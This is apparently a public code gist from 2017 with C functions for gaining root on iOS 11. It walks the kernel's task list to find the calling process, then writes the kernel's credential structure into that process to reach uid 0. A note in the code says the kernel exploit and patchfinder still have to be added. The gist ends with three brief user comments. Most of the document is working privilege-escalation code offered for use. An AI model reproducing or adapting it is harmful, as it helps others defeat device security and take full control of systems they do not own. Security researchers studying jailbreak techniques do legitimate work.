@cheesecakeufo
Created December 12, 2017 01:30
get uid: 0 - iOS 11
// gets uid 0 (iOS 11)
// add patchfinder and you should be good
// Abraham Masri @cheesecakeufo
/*
* Purpose: iterates over the procs and finds our proc
*/
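/*
 * Purpose: follows the TASK_PREV link starting from our own task and returns
 * the bsd_info (proc) whose pid equals getpid().
 *
 * Returns: kernel address of our proc, or UINT64_MAX when the walk ends
 * without a match. UINT64_MAX is the same bit pattern the old `return -1`
 * produced after conversion to uint64_t, so a caller's `== -1` check still
 * holds; the explicit constant just avoids the signed->unsigned conversion.
 *
 * Relies on the rk64/rk32 kernel-read primitives and the koffset() table
 * defined elsewhere in this file; a read that yields 0 for the next task
 * pointer terminates the loop.
 */
uint64_t get_our_proc() {
    /* hoisted: our pid does not change while we walk the list */
    const pid_t our_pid = getpid();
    uint64_t task_self = task_self_addr();
    uint64_t task = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));

    while (task != 0) {
        uint64_t bsd_info = rk64(task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
        /* p_pid is read out of the proc that task->bsd_info points to */
        uint32_t pid = rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID));
        if (pid == (uint32_t)our_pid) {
            return bsd_info;
        }
        task = rk64(task + koffset(KSTRUCT_OFFSET_TASK_PREV));
    }
    return UINT64_MAX; /* not found */
}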
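/*
 * Purpose: overwrites our proc's p_ucred pointer with the kernel's ucred so
 * the process ends up with uid 0, then reports the result via setuid(0) and
 * getuid() and probes a write-open of a path under /var/mobile.
 *
 * Returns: KERN_SUCCESS once the write has been issued; KERN_FAILURE when
 * get_our_proc() could not locate our proc.
 *
 * Uses the kread_uint64/kwrite_uint64 primitives (a different naming than
 * the rk64/rk32 helpers in get_our_proc — both are expected to exist in the
 * surrounding file). The p_ucred offset is hard-coded for the layout the
 * author targeted rather than taken from koffset().
 */
kern_return_t get_root () {
    extern uint64_t kernel_task;
    /* struct proc field offset as hard-coded by the author for iOS 11 */
    const uint64_t offsetof_p_ucred = 0x100; /* KSTRUCT_OFFSET_PROC_UCRED */

    uint64_t our_proc = get_our_proc();
    if (our_proc == UINT64_MAX) { /* get_our_proc()'s "not found" sentinel (-1 as uint64_t) */
        printf("[ERROR]: no our proc. wut\n");
        return KERN_FAILURE;
    }

    printf("[INFO]: kernel_task: %llx\n", kernel_task); // BSD_INFO
    uint64_t kern_ucred = kread_uint64(kernel_task + offsetof_p_ucred);
    printf("[INFO]: kern_ucred: %llx\n", kern_ucred);

    kwrite_uint64(our_proc + offsetof_p_ucred, kern_ucred);
    printf("[INFO]: successfully wrote our kern_ucred into our cred!\n");

    setuid(0);
    printf("[INFO]: getuid: %d\n", getuid());

    /* probe only: the descriptor was never used, so close it instead of leaking it */
    int fd = open("/var/mobile/xxx", O_WRONLY);
    if (fd >= 0) {
        close(fd);
    }
    // you'll probably panic few seconds after this thanks to the new sandbox protections
    return KERN_SUCCESS;
}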
@MODZ4FUN420

Will this be made into an API?

@simsdj

simsdj commented Dec 13, 2017

What even is this

@arinc9

arinc9 commented Dec 13, 2017

Stop lowering the IQ of this place.
